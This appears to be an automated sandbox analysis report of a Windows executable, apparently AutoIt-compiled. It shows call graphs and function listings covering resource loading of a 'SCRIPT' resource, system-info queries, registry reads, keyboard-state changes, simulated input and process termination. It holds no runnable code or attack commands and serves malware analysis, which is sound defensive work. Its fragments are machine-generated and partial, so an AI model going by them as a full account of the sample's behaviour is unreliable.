124beb 97421 14359c 82 API calls __wsopen_s 97408->97421 97409 f00a3 29 API calls pre_c_initialization 97409->97410 97410->97391 97410->97393 97410->97394 97410->97395 97410->97399 97410->97402 97410->97403 97410->97404 97410->97407 97410->97408 97410->97409 97410->97411 97410->97412 97413 e01e0 257 API calls 2 library calls 97410->97413 97414 e06a0 41 API calls messages 97410->97414 97412->97411 97418 14359c 82 API calls __wsopen_s 97412->97418 97413->97410 97414->97410 97415->97411 97416->97411 97417->97411 97418->97411 97419->97411 97420->97408 97421->97411 97422 112402 97425 d1410 97422->97425 97426 d144f mciSendStringW 97425->97426 97427 1124b8 DestroyWindow 97425->97427 97428 d146b 97426->97428 97429 d16c6 
97426->97429 97440 1124c4 97427->97440 97430 d1479 97428->97430 97428->97440 97429->97428 97431 d16d5 UnregisterHotKey 97429->97431 97458 d182e 97430->97458 97431->97429 97434 112509 97439 11252d 97434->97439 97441 11251c FreeLibrary 97434->97441 97435 1124e2 FindClose 97435->97440 97436 1124d8 97436->97440 97464 d6246 CloseHandle 97436->97464 97438 d148e 97438->97439 97445 d149c 97438->97445 97442 112541 VirtualFree 97439->97442 97447 d1509 97439->97447 97440->97434 97440->97435 97440->97436 97441->97434 97442->97439 97443 d14f8 OleUninitialize 97443->97447 97444 112589 97450 112598 messages 97444->97450 97465 1432eb 6 API calls messages 97444->97465 97445->97443 97447->97444 97448 d1514 97447->97448 97462 d1944 VirtualFreeEx CloseHandle 97448->97462 97454 112627 97450->97454 97466 1364d4 22 API calls messages 97450->97466 97452 d153a 97452->97450 97453 d161f 97452->97453 97453->97454 97455 d166d 97453->97455 97454->97454 97455->97454 97463 d1876 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 97455->97463 97457 d16c1 97459 d183b 97458->97459 97460 d1480 97459->97460 97467 13702a 22 API calls 97459->97467 97460->97434 97460->97438 97462->97452 97463->97457 97464->97436 97465->97444 97466->97450 97467->97459 97468 112ba5 97469 d2b25 97468->97469 97470 112baf 97468->97470 97496 d2b83 7 API calls 97469->97496 97514 d3a5a 97470->97514 97474 112bb8 97476 d9cb3 22 API calls 97474->97476 97478 112bc6 97476->97478 97477 d2b2f 97479 d2b44 97477->97479 97500 d3837 97477->97500 97480 112bf5 97478->97480 97481 112bce 97478->97481 97487 d2b5f 97479->97487 97510 d30f2 97479->97510 97482 d33c6 22 API calls 97480->97482 97521 d33c6 97481->97521 97495 112bf1 GetForegroundWindow ShellExecuteW 97482->97495 97492 d2b66 SetCurrentDirectoryW 97487->97492 97489 112be7 97493 d33c6 22 API calls 97489->97493 97490 112c26 97490->97487 97494 d2b7a 97492->97494 97493->97495 97495->97490 97531 d2cd4 7 API calls 97496->97531 97498 d2b2a 97499 d2c63 CreateWindowExW 
CreateWindowExW ShowWindow ShowWindow 97498->97499 97499->97477 97501 d3862 ___scrt_fastfail 97500->97501 97532 d4212 97501->97532 97505 113386 Shell_NotifyIconW 97506 d3906 Shell_NotifyIconW 97536 d3923 97506->97536 97507 d38e8 97507->97505 97507->97506 97509 d391c 97509->97479 97511 d3154 97510->97511 97512 d3104 ___scrt_fastfail 97510->97512 97511->97487 97513 d3123 Shell_NotifyIconW 97512->97513 97513->97511 97515 111f50 __wsopen_s 97514->97515 97516 d3a67 GetModuleFileNameW 97515->97516 97517 d9cb3 22 API calls 97516->97517 97518 d3a8d 97517->97518 97519 d3aa2 23 API calls 97518->97519 97520 d3a97 97519->97520 97520->97474 97522 d33dd 97521->97522 97523 1130bb 97521->97523 97562 d33ee 97522->97562 97524 efddb 22 API calls 97523->97524 97527 1130c5 _wcslen 97524->97527 97526 d33e8 97530 d6350 22 API calls 97526->97530 97528 efe0b 22 API calls 97527->97528 97529 1130fe __fread_nolock 97528->97529 97530->97489 97531->97498 97533 1135a4 97532->97533 97534 d38b7 97532->97534 97533->97534 97535 1135ad DestroyIcon 97533->97535 97534->97507 97558 13c874 42 API calls _strftime 97534->97558 97535->97534 97537 d393f 97536->97537 97556 d3a13 97536->97556 97538 d6270 22 API calls 97537->97538 97539 d394d 97538->97539 97540 113393 LoadStringW 97539->97540 97541 d395a 97539->97541 97543 1133ad 97540->97543 97542 d6b57 22 API calls 97541->97542 97544 d396f 97542->97544 97552 d3994 ___scrt_fastfail 97543->97552 97560 da8c7 22 API calls __fread_nolock 97543->97560 97545 d397c 97544->97545 97546 1133c9 97544->97546 97545->97543 97548 d3986 97545->97548 97561 d6350 22 API calls 97546->97561 97559 d6350 22 API calls 97548->97559 97551 1133d7 97551->97552 97553 d33c6 22 API calls 97551->97553 97554 d39f9 Shell_NotifyIconW 97552->97554 97555 1133f9 97553->97555 97554->97556 97557 d33c6 22 API calls 97555->97557 97556->97509 97557->97552 97558->97507 97559->97552 97560->97552 97561->97551 97563 d33fe _wcslen 97562->97563 97564 11311d 97563->97564 97565 d3411 97563->97565 97567 efddb 
22 API calls 97564->97567 97572 da587 97565->97572 97569 113127 97567->97569 97568 d341e __fread_nolock 97568->97526 97570 efe0b 22 API calls 97569->97570 97571 113157 __fread_nolock 97570->97571 97573 da59d 97572->97573 97576 da598 __fread_nolock 97572->97576 97574 11f80f 97573->97574 97575 efe0b 22 API calls 97573->97575 97575->97576 97576->97568 97577 f03fb 97578 f0407 ___BuildCatchObject 97577->97578 97606 efeb1 97578->97606 97580 f040e 97581 f0561 97580->97581 97584 f0438 97580->97584 97636 f083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97581->97636 97583 f0568 97629 f4e52 97583->97629 97595 f0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97584->97595 97617 10247d 97584->97617 97591 f0457 97594 f04de 97598 f04f3 97594->97598 97597 f04d8 97595->97597 97632 f4e1a 38 API calls 3 library calls 97595->97632 97625 f0959 97597->97625 97633 f0992 GetModuleHandleW 97598->97633 97600 f04fa 97600->97583 97601 f04fe 97600->97601 97602 f0507 97601->97602 97634 f4df5 28 API calls _abort 97601->97634 97635 f0040 13 API calls 2 library calls 97602->97635 97605 f050f 97605->97591 97607 efeba 97606->97607 97638 f0698 IsProcessorFeaturePresent 97607->97638 97609 efec6 97639 f2c94 10 API calls 3 library calls 97609->97639 97611 efecb 97612 efecf 97611->97612 97640 102317 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97611->97640 97612->97580 97614 efed8 97615 efee6 97614->97615 97641 f2cbd 8 API calls 3 library calls 97614->97641 97615->97580 97618 102494 97617->97618 97642 f0a8c 97618->97642 97620 f0451 97620->97591 97621 102421 97620->97621 97624 102450 97621->97624 97622 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97623 102479 97622->97623 97623->97595 97624->97622 97650 f2340 97625->97650 97628 f097f 97628->97594 97652 
f4bcf 97629->97652 97632->97597 97633->97600 97634->97602 97635->97605 97636->97583 97638->97609 97639->97611 97640->97614 97641->97612 97643 f0a97 IsProcessorFeaturePresent 97642->97643 97644 f0a95 97642->97644 97646 f0c5d 97643->97646 97644->97620 97649 f0c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97646->97649 97648 f0d40 97648->97620 97649->97648 97651 f096c GetStartupInfoW 97650->97651 97651->97628 97653 f4bdb IsInExceptionSpec 97652->97653 97654 f4bf4 97653->97654 97655 f4be2 97653->97655 97676 102f5e EnterCriticalSection 97654->97676 97691 f4d29 GetModuleHandleW 97655->97691 97658 f4be7 97658->97654 97692 f4d6d GetModuleHandleExW 97658->97692 97662 f4bfb 97672 f4c70 97662->97672 97675 f4c99 97662->97675 97677 1021a8 97662->97677 97664 f4cb6 97683 f4ce8 97664->97683 97665 f4ce2 97700 111d29 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 97665->97700 97668 102421 _abort 5 API calls 97674 f4c88 97668->97674 97669 102421 _abort 5 API calls 97669->97675 97672->97668 97672->97674 97674->97669 97680 f4cd9 97675->97680 97676->97662 97701 101ee1 97677->97701 97720 102fa6 LeaveCriticalSection 97680->97720 97682 f4cb2 97682->97664 97682->97665 97721 10360c 97683->97721 97686 f4d16 97688 f4d6d _abort 8 API calls 97686->97688 97687 f4cf6 GetPEB 97687->97686 97689 f4d06 GetCurrentProcess TerminateProcess 97687->97689 97690 f4d1e ExitProcess 97688->97690 97689->97686 97691->97658 97693 f4dba 97692->97693 97694 f4d97 GetProcAddress 97692->97694 97696 f4dc9 97693->97696 97697 f4dc0 FreeLibrary 97693->97697 97695 f4dac 97694->97695 97695->97693 97698 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97696->97698 97697->97696 97699 f4bf3 97698->97699 97699->97654 97704 101e90 97701->97704 97703 101f05 97703->97672 97705 101e9c ___BuildCatchObject 97704->97705 97712 
102f5e EnterCriticalSection 97705->97712 97707 101eaa 97713 101f31 97707->97713 97711 101ec8 __wsopen_s 97711->97703 97712->97707 97716 101f51 97713->97716 97717 101f59 97713->97717 97714 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97715 101eb7 97714->97715 97719 101ed5 LeaveCriticalSection _abort 97715->97719 97716->97714 97717->97716 97718 1029c8 _free 20 API calls 97717->97718 97718->97716 97719->97711 97720->97682 97722 103631 97721->97722 97723 103627 97721->97723 97728 102fd7 5 API calls 2 library calls 97722->97728 97725 f0a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 97723->97725 97726 f4cf2 97725->97726 97726->97686 97726->97687 97727 103648 97727->97723 97728->97727 97729 d1098 97734 d42de 97729->97734 97733 d10a7 97735 da961 22 API calls 97734->97735 97736 d42f5 GetVersionExW 97735->97736 97737 d6b57 22 API calls 97736->97737 97738 d4342 97737->97738 97739 d93b2 22 API calls 97738->97739 97751 d4378 97738->97751 97740 d436c 97739->97740 97742 d37a0 22 API calls 97740->97742 97741 d441b GetCurrentProcess IsWow64Process 97743 d4437 97741->97743 97742->97751 97744 d444f LoadLibraryA 97743->97744 97745 113824 GetSystemInfo 97743->97745 97746 d449c GetSystemInfo 97744->97746 97747 d4460 GetProcAddress 97744->97747 97749 d4476 97746->97749 97747->97746 97748 d4470 GetNativeSystemInfo 97747->97748 97748->97749 97752 d447a FreeLibrary 97749->97752 97753 d109d 97749->97753 97750 1137df 97751->97741 97751->97750 97752->97753 97754 f00a3 29 API calls __onexit 97753->97754 97754->97733 97755 d105b 97760 d344d 97755->97760 97757 d106a 97791 f00a3 29 API calls __onexit 97757->97791 97759 d1074 97761 d345d __wsopen_s 97760->97761 97762 da961 22 API calls 97761->97762 97763 d3513 97762->97763 97764 d3a5a 24 API calls 97763->97764 97765 d351c 97764->97765 97792 d3357 97765->97792 97768 d33c6 22 
API calls 97769 d3535 97768->97769 97770 d515f 22 API calls 97769->97770 97771 d3544 97770->97771 97772 da961 22 API calls 97771->97772 97773 d354d 97772->97773 97774 da6c3 22 API calls 97773->97774 97775 d3556 RegOpenKeyExW 97774->97775 97776 113176 RegQueryValueExW 97775->97776 97780 d3578 97775->97780 97777 113193 97776->97777 97778 11320c RegCloseKey 97776->97778 97779 efe0b 22 API calls 97777->97779 97778->97780 97787 11321e _wcslen 97778->97787 97781 1131ac 97779->97781 97780->97757 97783 d5722 22 API calls 97781->97783 97782 d4c6d 22 API calls 97782->97787 97784 1131b7 RegQueryValueExW 97783->97784 97785 1131d4 97784->97785 97788 1131ee messages 97784->97788 97786 d6b57 22 API calls 97785->97786 97786->97788 97787->97780 97787->97782 97789 d9cb3 22 API calls 97787->97789 97790 d515f 22 API calls 97787->97790 97788->97778 97789->97787 97790->97787 97791->97759 97793 111f50 __wsopen_s 97792->97793 97794 d3364 GetFullPathNameW 97793->97794 97795 d3386 97794->97795 97796 d6b57 22 API calls 97795->97796 97797 d33a4 97796->97797 97797->97768 97798 ef698 97799 ef6a2 97798->97799 97800 ef6c3 97798->97800 97807 daf8a 97799->97807 97805 12f2f8 97800->97805 97815 134d4a 22 API calls messages 97800->97815 97803 ef6b2 97804 daf8a 22 API calls 97803->97804 97806 ef6c2 97804->97806 97808 daf98 97807->97808 97809 dafc0 messages 97807->97809 97810 dafa6 97808->97810 97811 daf8a 22 API calls 97808->97811 97809->97803 97812 dafac 97810->97812 97813 daf8a 22 API calls 97810->97813 97811->97810 97812->97809 97816 db090 97812->97816 97813->97812 97815->97800 97817 db09b messages 97816->97817 97819 db0d6 messages 97817->97819 97820 ece17 22 API calls messages 97817->97820 97819->97809 97820->97819 97821 d2e37 97822 da961 22 API calls 97821->97822 97823 d2e4d 97822->97823 97900 d4ae3 97823->97900 97825 d2e6b 97826 d3a5a 24 API calls 97825->97826 97827 d2e7f 97826->97827 97828 d9cb3 22 API calls 97827->97828 97829 d2e8c 97828->97829 97830 d4ecb 94 API calls 97829->97830 97831 d2ea5 
97830->97831 97832 d2ead 97831->97832 97833 112cb0 97831->97833 97914 da8c7 22 API calls __fread_nolock 97832->97914 97834 142cf9 80 API calls 97833->97834 97835 112cc3 97834->97835 97837 112ccf 97835->97837 97839 d4f39 68 API calls 97835->97839 97841 d4f39 68 API calls 97837->97841 97838 d2ec3 97915 d6f88 22 API calls 97838->97915 97839->97837 97843 112ce5 97841->97843 97842 d2ecf 97844 d9cb3 22 API calls 97842->97844 97926 d3084 22 API calls 97843->97926 97845 d2edc 97844->97845 97846 da81b 41 API calls 97845->97846 97848 d2eec 97846->97848 97850 d9cb3 22 API calls 97848->97850 97849 112d02 97927 d3084 22 API calls 97849->97927 97852 d2f12 97850->97852 97853 da81b 41 API calls 97852->97853 97856 d2f21 97853->97856 97854 112d1e 97855 d3a5a 24 API calls 97854->97855 97857 112d44 97855->97857 97860 da961 22 API calls 97856->97860 97928 d3084 22 API calls 97857->97928 97859 112d50 97929 da8c7 22 API calls __fread_nolock 97859->97929 97862 d2f3f 97860->97862 97916 d3084 22 API calls 97862->97916 97863 112d5e 97930 d3084 22 API calls 97863->97930 97866 d2f4b 97868 f4a28 _strftime 40 API calls 97866->97868 97867 112d6d 97931 da8c7 22 API calls __fread_nolock 97867->97931 97869 d2f59 97868->97869 97869->97843 97870 d2f63 97869->97870 97872 f4a28 _strftime 40 API calls 97870->97872 97874 d2f6e 97872->97874 97873 112d83 97932 d3084 22 API calls 97873->97932 97874->97849 97876 d2f78 97874->97876 97877 f4a28 _strftime 40 API calls 97876->97877 97879 d2f83 97877->97879 97878 112d90 97879->97854 97880 d2f8d 97879->97880 97881 f4a28 _strftime 40 API calls 97880->97881 97882 d2f98 97881->97882 97883 d2fdc 97882->97883 97917 d3084 22 API calls 97882->97917 97883->97867 97884 d2fe8 97883->97884 97884->97878 97920 d63eb 22 API calls 97884->97920 97887 d2fbf 97918 da8c7 22 API calls __fread_nolock 97887->97918 97888 d2ff8 97921 d6a50 22 API calls 97888->97921 97891 d2fcd 97919 d3084 22 API calls 97891->97919 97892 d3006 97922 d70b0 23 API calls 97892->97922 97897 d3021 97898 d3065 
97897->97898 97923 d6f88 22 API calls 97897->97923 97924 d70b0 23 API calls 97897->97924 97925 d3084 22 API calls 97897->97925 97901 d4af0 __wsopen_s 97900->97901 97902 d6b57 22 API calls 97901->97902 97903 d4b22 97901->97903 97902->97903 97904 d4c6d 22 API calls 97903->97904 97910 d4b58 97903->97910 97904->97903 97905 d9cb3 22 API calls 97907 d4c52 97905->97907 97906 d9cb3 22 API calls 97906->97910 97908 d515f 22 API calls 97907->97908 97912 d4c5e 97908->97912 97909 d4c6d 22 API calls 97909->97910 97910->97906 97910->97909 97911 d515f 22 API calls 97910->97911 97913 d4c29 97910->97913 97911->97910 97912->97825 97913->97905 97913->97912 97914->97838 97915->97842 97916->97866 97917->97887 97918->97891 97919->97883 97920->97888 97921->97892 97922->97897 97923->97897 97924->97897 97925->97897 97926->97849 97927->97854 97928->97859 97929->97863 97930->97867 97931->97873 97932->97878 97933 d3156 97936 d3170 97933->97936 97937 d3187 97936->97937 97938 d318c 97937->97938 97939 d31eb 97937->97939 97976 d31e9 97937->97976 97943 d3199 97938->97943 97944 d3265 PostQuitMessage 97938->97944 97941 112dfb 97939->97941 97942 d31f1 97939->97942 97940 d31d0 DefWindowProcW 97968 d316a 97940->97968 97991 d18e2 10 API calls 97941->97991 97945 d321d SetTimer RegisterWindowMessageW 97942->97945 97946 d31f8 97942->97946 97948 d31a4 97943->97948 97949 112e7c 97943->97949 97944->97968 97953 d3246 CreatePopupMenu 97945->97953 97945->97968 97950 d3201 KillTimer 97946->97950 97951 112d9c 97946->97951 97954 d31ae 97948->97954 97955 112e68 97948->97955 97994 13bf30 34 API calls ___scrt_fastfail 97949->97994 97959 d30f2 Shell_NotifyIconW 97950->97959 97957 112da1 97951->97957 97958 112dd7 MoveWindow 97951->97958 97952 112e1c 97992 ee499 42 API calls 97952->97992 97953->97968 97962 d31b9 97954->97962 97963 112e4d 97954->97963 97981 13c161 97955->97981 97965 112da7 97957->97965 97966 112dc6 SetFocus 97957->97966 97958->97968 97967 d3214 97959->97967 97969 d31c4 97962->97969 97970 d3253 97962->97970 
97963->97940 97993 130ad7 22 API calls 97963->97993 97964 112e8e 97964->97940 97964->97968 97965->97969 97971 112db0 97965->97971 97966->97968 97988 d3c50 DeleteObject DestroyWindow 97967->97988 97969->97940 97978 d30f2 Shell_NotifyIconW 97969->97978 97989 d326f 44 API calls ___scrt_fastfail 97970->97989 97990 d18e2 10 API calls 97971->97990 97976->97940 97977 d3263 97977->97968 97979 112e41 97978->97979 97980 d3837 49 API calls 97979->97980 97980->97976 97982 13c276 97981->97982 97983 13c179 ___scrt_fastfail 97981->97983 97982->97968 97984 d3923 24 API calls 97983->97984 97986 13c1a0 97984->97986 97985 13c25f KillTimer SetTimer 97985->97982 97986->97985 97987 13c251 Shell_NotifyIconW 97986->97987 97987->97985 97988->97968 97989->97977 97990->97968 97991->97952 97992->97969 97993->97976 97994->97964 97995 d1033 98000 d4c91 97995->98000 97999 d1042 98001 da961 22 API calls 98000->98001 98002 d4cff 98001->98002 98008 d3af0 98002->98008 98004 d4d9c 98006 d1038 98004->98006 98011 d51f7 22 API calls __fread_nolock 98004->98011 98007 f00a3 29 API calls __onexit 98006->98007 98007->97999 98012 d3b1c 98008->98012 98011->98004 98013 d3b0f 98012->98013 98014 d3b29 98012->98014 98013->98004 98014->98013 98015 d3b30 RegOpenKeyExW 98014->98015 98015->98013 98016 d3b4a RegQueryValueExW 98015->98016 98017 d3b80 RegCloseKey 98016->98017 98018 d3b6b 98016->98018 98017->98013 98018->98017

Control-flow Graph

• Executed
• Not Executed
Graph for the function at 000D42DE (rendered as an image in the original report; the basic-block list is omitted here). Blocks in the graph call da961, GetVersionExW and d6b57 at entry, then d93b2/d37a0, GetCurrentProcess and IsWow64Process, then LoadLibraryA, GetProcAddress and GetNativeSystemInfo with GetSystemInfo on the alternative path, and FreeLibrary before returning. Which blocks were executed is not recoverable from the extracted text.
APIs
• GetVersionExW.KERNEL32(?), ref: 000D430D
  • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
• GetCurrentProcess.KERNEL32(?,0016CB64,00000000,?,?), ref: 000D4422
• IsWow64Process.KERNEL32(00000000,?,?), ref: 000D4429
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 000D4454
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 000D4466
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 000D4474
• FreeLibrary.KERNEL32(00000000,?,?), ref: 000D447B
• GetSystemInfo.KERNEL32(?,?,?), ref: 000D44A0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                          • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                          • Opcode ID: 7826043a325f518e12c4acccdd1e63e68ddfe805c36c431ee7ea727eea0d9374
                                                                                                                                                                                                                                          • Instruction ID: 7d17e62b357c203bec40248ff4a0c8e563a13789a86cd6f83947f9259eb53e5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7826043a325f518e12c4acccdd1e63e68ddfe805c36c431ee7ea727eea0d9374
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9A14F6690A3D0EFCF15CF6A6C411E97EA47F27360F0848AAD09197F66D6704ACCCB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 638 d42a2-d42ba CreateStreamOnHGlobal 639 d42bc-d42d3 FindResourceExW 638->639 640 d42da-d42dd 638->640 641 d42d9 639->641 642 1135ba-1135c9 LoadResource 639->642 641->640 642->641 643 1135cf-1135dd SizeofResource 642->643 643->641 644 1135e3-1135ee LockResource 643->644 644->641 645 1135f4-113612 644->645 645->641
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,000D50AA,?,?,00000000,00000000), ref: 000D42B2
                                                                                                                                                                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000D50AA,?,?,00000000,00000000), ref: 000D42C9
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,000D50AA,?,?,00000000,00000000,?,?,?,?,?,?,000D4F20), ref: 001135BE
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000,?,?,000D50AA,?,?,00000000,00000000,?,?,?,?,?,?,000D4F20), ref: 001135D3
                                                                                                                                                                                                                                          • LockResource.KERNEL32(000D50AA,?,?,000D50AA,?,?,00000000,00000000,?,?,?,?,?,?,000D4F20,?), ref: 001135E6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                                                                          • String ID: SCRIPT
                                                                                                                                                                                                                                          • API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                          • Opcode ID: e86b68f34031ee672bfd979f5551230146110693aded3cf1ca022cfe26db4330
                                                                                                                                                                                                                                          • Instruction ID: 6b686991afd205787a0c7732fdf5853b6df7b4596bfe609d39a321bc86fbe15b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e86b68f34031ee672bfd979f5551230146110693aded3cf1ca022cfe26db4330
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38117C70600701BFE7218B65DC48F777BBAEBC5B51F10416EF846D6650DBB1D8408AB0
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 879 13ab9c-13abc0 880 13abc6-13abc9 879->880 881 13ac7c-13ac7f 879->881 880->881 882 13abcf-13abd2 880->882 883 13aca2-13acc6 SendInput 881->883 884 13ac81-13ac8d call 139e8d 881->884 882->881 886 13abd8-13abdb 882->886 885 13accc-13acce call 139c49 883->885 891 13ac93 884->891 892 13ac8f-13ac91 884->892 893 13acd3-13acd7 885->893 886->881 890 13abe1-13abe4 886->890 890->885 894 13abea-13abf9 GetKeyboardState 890->894 897 13ac95-13ac9b call 13b226 891->897 892->897 895 13ac13-13ac2d call 139e8d 894->895 896 13abfb-13ac0d SetKeyboardState 894->896 902 13ac38-13ac3c 895->902 903 13ac2f-13ac32 895->903 896->895 901 13aca0 897->901 901->885 904 13ac49-13ac4d 902->904 905 13ac3e-13ac42 902->905 903->902 907 13ac67-13ac6c 904->907 908 13ac4f-13ac53 904->908 905->904 906 13ac44-13ac47 905->906 906->904 906->907 910 13ac71-13ac7a PostMessageW 907->910 908->907 909 13ac55-13ac65 908->909 909->910 910->885
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 0013ABF1
                                                                                                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 0013AC0D
                                                                                                                                                                                                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 0013AC74
                                                                                                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 0013ACC6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                                                                                                          • Opcode ID: 56ae58f4aec6249042cb0b97a53423a59017c40e2faf805e56a465ba3ed47526
                                                                                                                                                                                                                                          • Instruction ID: a80315fd21fecc92dca7d14df596a7f26afcfd379fb5cb60e506059fa9ecb00d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56ae58f4aec6249042cb0b97a53423a59017c40e2faf805e56a465ba3ed47526
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D310730A047186FFF35CB65CC087FA7BA5AF89320F88631AE4C5962D1C3759D858792
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(001028E9,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002,00000000,?,001028E9), ref: 000F4D09
                                                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,000F4CBE,001028E9,001988B8,0000000C,000F4E15,001028E9,00000002,00000000,?,001028E9), ref: 000F4D10
                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 000F4D22
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmpDownload File
